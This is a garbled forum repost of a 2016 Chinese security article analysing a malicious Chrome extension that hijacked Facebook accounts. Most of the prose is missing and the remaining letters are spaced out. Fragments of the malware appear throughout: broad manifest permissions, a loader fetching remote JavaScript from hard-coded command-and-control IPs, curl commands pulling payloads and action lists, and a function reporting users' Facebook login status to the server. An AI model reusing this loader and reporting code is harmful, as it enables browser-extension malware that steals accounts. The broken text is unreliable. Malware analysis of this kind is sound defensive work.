[10325] 2016-07-21_走近科学Chrome恶意插件如何入侵用户计算机?

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2016-07-21_走近科学Chrome恶意插件如何入侵用户计算机?   |   C h r o m e d a w n e r   F r e e B u f   2 0 1 6 - 0 7 - 2 1 W E B F a c e b o o k A m a z o n G m a i l 线 使 线 使 使 线 使 H T T P - o n l y F a c e b o o k F a c e b o o k f e e d F a c e b o o k 9 0 0 3 0 2 5
西 访 C h r o m e
v i r a l a n d s . c o m 西 1 3 2 2 6 5
m a n i f e s t . j s o n C h r o m e   V i r a l C o n t e n t   A g e   V e r i f y ? 访 J S J S b a c k g r o u n d . j s q u e r y - s t r i n g . j s i n s t a l l . j s 怀 b a c k g r o u n d . j s J S {                   " p e r m i s s i o n s " : [                                       " s t o r a g e " ,                                       " < a l l _ u r l s > " ,                                       " t a b s " ,                                       " w e b N a v i g a t i o n " ,                                       " a l a r m s "                   ] } {                   " b a c k g r o u n d " : {                                       " s c r i p t s " : [                                                         " s c r i p t s / q u e r y - s t r i n g . j s " ,                                                         " s c r i p t s / i n s t a l l . j s " ,                                                         " b a c k g r o u n d . j s "                                       ] , d o c u m e n t . q u e r y S e l e c t o r ( ' # s u b m i t ' ) . a d d E v e n t L i s t e n e r ( ' c l i c k ' , f u n c t i o n ( )   {                   d o c u m e n t . q u e r y S e l e c t o r ( ' # b o x ' ) . h i d d e n =   t r u e ;                   d o c u m e n t . q u e r y S e l e c t o r ( ' # l o a d i n g ' ) . h i d d e n =   f a l s e ;                   s e t T i m e o u t ( f u n c t i o n ( ) {
V e r i f y L o a d i n g D o n e q u e r y - s t r i n g . j s i n s t a l l . j s p a y l o a d q u e r y - s t r i n g . j s N P M i n s t a l l . j s 1 3 3 H T T P S p a y l o a d C h r o m e   W e b s t o r e l o c a l S t o r a g e g e t P r o g r a m ( ) c U R L p a y l o a d e x t e r n a l . j s 1 2 8 8 e x t e r n a l . j s U R L U R L C & C C & C e x t e r n a l . j s g e t A c t i o n s ( ) u i d g e n e r a t e U I D ( ) g e n e r a t e U I D U I D J S O N 访 访 A c c e s s   T o k e n 访 J S O N 访 U R L c a l l b a c k 访 F a c e b o o k 访 访 F a c e b o o k 访 V V i d e o s s s   v a r   p r o g r a m U r l   = ' h t t p : / / 1 0 4 . 1 3 1 . 3 5 . 1 3 6 : 9 9 9 9 / j s n e w . p h p ? i d = 2 2 ' ; f u n c t i o n   g e t P r o g r a m ( e v e n t )   {                   v a r x h r   =   n e w   X M L H t t p R e q u e s t ( ) ;                   v a r u r l   =   p r o g r a m U r l ;                   v a r q u e r y S i g n   =   u r l . i n d e x O f ( ' ? ' )   = = =   - 1   ?   ' ? '   :   ' & ' ;                   u r l + =   q u e r y S i g n   +   ' r = '   +   D a t e . n o w ( ) ; c u r l   - o   e x t e r n a l . j s   - - h e a d e r " X Y Z - E x t e n s i o n - I d :   n o g h e b l b l c g k n c m p g g m i k m c p n j d i h g d d " h t t p : / / 1 0 4 . 1 3 1 . 3 5 . 1 3 6 : 9 9 9 9 / j s n e w . p h p ? i d = 2 2 & r = 1 4 6 7 8 8 3 0 3 7 0 0 0 v a r   A C T I O N S _ U R L   = ' h t t p : / / 1 5 9 . 2 0 3 . 9 9 . 2 0 6 / a p i / g e t / ' ; v a r   S T A T U S _ U R L   = ' h t t p : / / 1 5 9 . 2 0 3 . 9 9 . 2 0 6 / a p i / s t a t u s ' ; f u n c t i o n   g e t A c t i o n s ( u i d )   {                   v a r x h r   =   n e w   X M L H t t p R e q u e s t ( ) ;                   x h r . o p e n ( ' G E T ' , A C T I O N S _ U R L   +   u i d ,   t r u e ) ;                   x h r . r e s p o n s e T y p e =   ' j s o n ' ;                         x h r . o n l o a d =   f u n c t i o n ( )   {                                       v a r d a t a   =   x h r . r e s p o n s e ; f u n c t i o n   g e n e r a t e U I D ( )   {                   v a r a r r a y   =   n e w   U i n t 3 2 A r r a y ( 8 ) ;                   w i n d o w . c r y p t o . g e t R a n d o m V a l u e s ( a r r a y ) ;                                   r e t u r n [ ] . m a p . c a l l ( a r r a y ,   f u n c t i o n ( n )   {                                       r e t u r n n . t o S t r i n g ( 1 6 ) c 3 8 a e 4 e c 1 d 2 8 2 0 b c 9 e 2 c 0 3 c 0 f e 5 1 7 5 8 5 6 4 4 5 7 6 c 9 8 8 a 0 3 a e 8 4 a f 6 3 b 6 d 2 b c 9 e 7 c u r l   - o   a c t i o n s . j s o n h t t p : / / 1 5 9 . 2 0 3 . 9 9 . 2 0 6 / a p i / g e t / c 3 8 a e 4 e c 1 d 2 8 2 0 b c 9 e 2 c 0 3 c 0 f e 5 1 7 5 8 5 6 4 4 5 7 6 c 9 8 8 a 0 3 a e 8 4 a f 6 3 b 6 d 2 b c 9 e 7
Y o u T u b e Y o u T u b e C & C C & C 西 西 1 . U I D 2 . I D C h r o m e   W e b s t o r e 3 . F a c e b o o k 便 p a y l o a d e m a i l D D o S V i r a l a n d s   C h r o m e   W e b s t o r e 线 1 3 2 , 2 6 5 C & C w i k i   C & C 使 I P a l y z e r I P D i g i t a l O c e a n 便 D i g i t a l O c e a n   C & C 使 f u n c t i o n   s e n d S t a t u s ( d a t a )   {                   c h r o m e . s t o r a g e . l o c a l . g e t ( ' u i d ' , f u n c t i o n ( s t o r a g e )   {                                       d a t a . i d =   s t o r a g e . u i d ;                                       d a t a . e x t e n s i o n _ i d =   c h r o m e . r u n t i m e . i d ;                                       d a t a . f b L o g i n S t a t u s =   f b L o g i n S t a t u s ;
g i t h u b 8 6 T B 2 0 K B C h r o m e C h r o m e   W e b s t o r e p a y l o a d C h r o m e C h r o m e   W e b s t o r e W E B C h r o m e W i l l   H a r r i s 1 3 2 , 0 0 0 便 * k j a e r F B d a w n e r F r e e B u f F r e e B u f . C O M    
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则